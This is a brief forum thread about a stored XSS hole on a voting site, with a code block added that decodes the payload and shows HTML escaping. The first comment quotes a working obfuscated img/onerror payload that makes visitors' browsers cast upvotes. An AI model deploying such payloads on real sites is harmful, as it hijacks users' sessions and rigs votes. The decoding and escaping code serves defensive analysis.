zlacker

1. Antony+(OP)[view] [source] 2023-06-13 13:54:21
Yes, the site is vulnerable to XSS; a couple of interesting payloads on there so far.

The current top post uses this XSS to have users upvote it:

<img src="a" onerror="soci.postData(String.fromCharCode(112,111,115,116,116,97,103,47,97,100,100,45,118,111,116,101),{post:String.fromCharCode(120),tag:String.fromCharCode(120)})">

Which sends a POST request to `posttag/add-vote` for the post labeled `x`.

replies(1): >>lyu072+8m
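
For triage of the payload quoted in the comment above, the following is an added example, not part of the original thread or the site's code. It decodes the `String.fromCharCode` calls without executing anything, flags the inline event handler, and shows the same string rendered inert by HTML output encoding. The function names are hypothetical, and it assumes the comment body is emitted as HTML body text.

```javascript
// Constructed sample: the stored comment body quoted in the post above.
const storedComment =
  '<img src="a" onerror="soci.postData(String.fromCharCode(112,111,115,116,116,97,103,47,97,100,100,45,118,111,116,101),' +
  '{post:String.fromCharCode(120),tag:String.fromCharCode(120)})">';

// Replace each String.fromCharCode(n, n, ...) call with the quoted string it
// evaluates to. Only the numeric arguments are read; the payload never runs.
function deobfuscateCharCodes(source) {
  return source.replace(
    /String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g,
    (_, args) => {
      const codes = args.split(",").map((n) => Number(n.trim()));
      return JSON.stringify(String.fromCharCode(...codes));
    }
  );
}

// List inline event-handler attributes (onerror=, onload=, ...) found in
// stored markup. Useful as a sweep over existing posts, not as a sanitizer.
function findEventHandlers(html) {
  const matches = html.match(/\son[a-z]+\s*=/gi) || [];
  return matches.map((m) => m.trim().replace(/\s*=$/, "").toLowerCase());
}

// Output encoding for the HTML body context: the browser displays the
// characters instead of parsing them as a tag with an onerror handler.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

console.log("decoded :", deobfuscateCharCodes(storedComment));
console.log("handlers:", findEventHandlers(storedComment));
console.log("escaped :", escapeHtml(storedComment));
```
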
2. lyu072+8m[view] [source] 2023-06-13 15:25:22
>>Antony+(OP)
I suppose that makes sense if you get paid for upvotes. Stored XSS is probably just the lowest-hanging fruit; if they messed that up I'd expect everything from CSRF, clickjacking, SQLi and more. Everyone has the incentive to look and exploit. They should probably get a thorough white box review.